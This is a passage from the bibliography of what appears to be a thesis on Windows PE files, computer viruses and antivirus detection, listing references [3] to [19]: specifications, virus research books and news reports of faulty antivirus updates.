[3] c0v3rt+. Adding sections to PE Files: Enhancing functionality of programsby adding extra code. http://www.woodmann.com/fravia/covert1.htm, July1999.

[4] David M. Chess and Steve R. White. An Undetectable Computer Virus.Proceedings of Virus Bulletin Conference, 2000.

[5] CNET. Flawed Symantec update cripples Chinese PCs, May 2007.

[6] ExtremeTech. Antivirus Research and Detection Techniques.http://www.extremetech.com/computing/51498-antivirus-research-and-detection-techniques, July 2002.

[7] HBGary. Loading a DLL without calling LoadLibrary.http://www.hbgary.com/loading-a-dll-without-calling-loadlibrary.

[8] The Inquirer. MSE false positive detection forces Google to update Chrome,October 2011.

[9] Mark A. Ludwig. The Giant Black Book of Computer Viruses. Amer EaglePubns Inc, 1995.

[10] Microsoft. Microsoft PE and COFF Specification. Revision September2010.

[11] Norman. The Norman Book on Computer Viruses. 2002.

61

62 BIBLIOGRAPHY

[12] Matt Pietrek. Peering Inside the PE: A Tour of the Win32 PortableExecutable File Format. MSDN Magazine, 9(3), March 1994.

[13] Matt Pietrek. Inside Windows: An In-Depth Look into the Win32 PortableExecutable File Format (Part I). MSDN Magazine, 17(2), February 2002.

[14] Matt Pietrek. Inside Windows: An In-Depth Look into the Win32 PortableExecutable File Format (Part II). MSDN Magazine, 17(3), March 2002.

[15] Ed Skoudis and Lenny Zeltser. Malware: Fighting Malicious Code. PrenticeHall, November 2003.

[16] Peter Szor. The Art of Computer Virus Research and Defense. PearsonEducation, 2005.

[17] Andrew S. Tanenbaum. Modern Operating Systems. Prentice Hall, 3rdedition, 2007.

[18] Ollie Whitehouse. An Analysis of Address Space Layout Randomization onWindows VistaTM. Symantec Advanced Threat Research, 2007.

[19] ZDNet. McAfee to compensate businesses for buggy update, April 2010.